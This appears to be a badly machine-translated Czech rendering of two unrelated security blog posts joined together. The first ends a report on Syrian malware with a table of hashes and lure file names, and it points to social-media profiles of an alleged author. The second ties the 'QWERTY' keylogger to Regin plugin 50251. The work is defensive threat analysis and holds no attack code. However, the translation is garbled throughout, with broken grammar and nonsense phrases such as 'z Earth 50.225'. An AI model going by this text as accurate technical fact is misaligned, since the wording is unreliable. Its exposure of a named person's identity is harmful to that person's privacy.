Byly analyzovány stovky vzorků týkající se syrským malware, jeden z vzorků, extrakty se více dokumentů, v jednom z nichž jsme byli schopni najít metadat skluz, který se extrahuje do určité zajímavé informace.

Metadata skluzu by chlap pomocí "Joe", jako jeho přezdívka, odhalil jeho osobní e-mail, který používáte další výzkum povede jeho další e-maily, plná identita, sociální stránkách ...

Joe_15

Na Facebooku:

Joe_16

Na LinkedIn:

Joe_18

Indikátory kompromisu

MD5 Hash Jméno (jména), použitý pro soubor malware První pohledu
f62cfd2484ff8c5b1a4751366e914613 Adobe.exe
Reader.exe
Card.exe 09. 2013
012f25d09fd53aeeddc11c23902770a7
89e6ae33b170ee712b47449bbbd84784 قائمة الأرهاب .zip ("seznam terorismu") soubor extrakty do JPG a škodlivé SCR 01. 2014
dc6166005db7487c9a8b32d938fec846
62023eb959a79bbdecd5aa167b51541f TheSSL.exe ("odstranit SSL slabosti")
SSL Cleaner.rar 04. 2014
cc694b1f8f0cd901f65856e419233044 Desktop.exe
Empty.exe
Host.exe 03. 2014
d6ab8ca6406fefe29e91c0604c812ff9 Skype.exe
Skypecleaner.exe 07. 2014
2e07e8622b4e997f6543fc0497452dad VPN.exe 09. 2014
efdaa73e0ac1b045d5f2214cadd77f09 Rooms.exe (k "šifrování Facebook") 11. 2014
39d0d7e6880652e58b2d4d6e50ca084c Photo.exe 11. 2014
abf3cfecd2e194961fc97dac34f57b24 Ram.exe
Setup.exe 11. 2014
a238f8ab946516b6153816c5fb4307be tdskiler.exe (k "odstranění škodlivého softwaru") 01. 2015
6379afd35285e16df4cb81803fde382c Locker.exe (k "šifrování / dešifrování" souborů) 01. 2015
Kaspersky Lab detekuje všechny škodlivé soubory používané v útocích.
Všechny soubory jsou aktivně využívány zločinci v době této zprávy.

Závěr

Syrská malware má silnou závislost na sociální inženýrství a aktivní rozvoj škodlivých variant. Nicméně, většina z nich se rychle odhalí svou pravou podstatu, když pečlivě prohlédnout; a toto je jeden z hlavních důvodů pro přitlačování syrských uživatelům být extra hlídat, co stáhnout a provádět vrstvený obranný přístup. Očekáváme, že tyto útoky vyvíjet a to jak v kvalitě a množství.


Srovnáme-li Regin modul 50251 a "QWERTY" keylogger
1.2.2015 Viry

17. ledna 2015 Spiegel.de publikoval rozsáhlý článek na základě dokumentů získaných od Edward Snowden. Ve stejné době, ale za předpokladu, kopii škodlivého programu s kódovým označením "QWERTY" ( http://www.spiegel.de/media/media-35668.pdf ), údajně používán několika vlád ve svých operacích CNE.

Jsme obdrželi kopii škodlivých souborů publikovaných Der Spiegel, a když jsme je analyzovali, že nás okamžitě připomněl Regin . Při pohledu na úzce kód, jsme došli k závěru, že "QWERTY" malware má stejné funkce s Regin 50.251 plugin.

Analýza

QWERTY modul balíček se skládá ze tří binárních souborů a doprovodné konfiguračních souborů. Jeden soubor z package- 20123.sys - je zvláště zajímavý.

V "20123.sys" je součástí režimu jádra v keylogger. Jak se ukázalo, byl postaven ze zdrojového kódu, který lze nalézt také jeden Regin modul, je "50251" plugin.

Použití binární rozdíl je snadné rozpoznat významnou část kódu, která je sdílená mezi oběma soubory:

regin3_1

regin3_1

Většina sdíleného kódu patří k funkci, která přistupuje k ovladač klávesnice systému:

regin3_2

regin3_2

Většina "qwerty" komponent volání pluginy ze stejného balíčku (s čísly plugin 20121-20123), ale je zde také jeden kus kódu, který odkazuje na pluginy z plošiny Regin. Jedna konkrétní část kódu je používat jak na "QWERTY" 20123 modulem a Regin je 50.251 protějšek, a to řeší plugin 50225, který lze nalézt v virtuální souborové systémy v Regin. V Regin je plugin 50225 je reponsible pro kernel-mode hákování.

regin3_3

regin3_3

To je důkazem toho, Qwerty plugin může fungovat pouze jako součást platformy Regin , využití do jádra hákovým funkce z Earth 50.225.

Jako další důkaz, že oba moduly používají stejnou softwarovou platformu , můžeme se podívat na funkce vyvážené pořadovým 1 obou modulů. Obsahují spouštěcí kód, který lze nalézt v žádném jiném plugin z Regin, a zahrnují aktuální počet plugin, který je registrován v rámci platformy umožní více se zaměřit na modulu. To má smysl pouze v případě, že moduly jsou použity s platformou Orchestrator Regin.

regin3_4

regin3_4

Důvodem, proč tyto dva moduly mají různé plug-ID je neznámá. Je to snad proto, že se zadlužuje různými subjekty, z nichž každý má své vlastní přidělené plugin ID rozsahy.

Závěry

Naše analýza QWERTY malware publikované Der Spiegel uvádí, že je plugin tak, aby fungoval část platformy Regin. QWERTY keylogger nefunguje jako samostatný modul, se opírá o jaderných hákových funkcí, které jsou poskytovány v Regin modulem 50225. Vzhledem k extrémní složitosti platformy Regin a malá šance, že to může být duplicitní někdo bez přístupu jeho sourcecodes, dojdeme k závěru, že malware vývojáři QWERTY a vývojáři Regin jsou stejné nebo pracují společně.

Dalším důležitým poznatkem je, že Regin pluginy jsou uloženy v šifrované a komprimované VFS, což znamená, že neexistují přímo na počítači oběti v "nativní" formát. Načte platforma dispečerské a provádí tam pluginy při startu. Jediný způsob, jak chytit keylogger je skenováním systémové paměti nebo dekódování VFSes.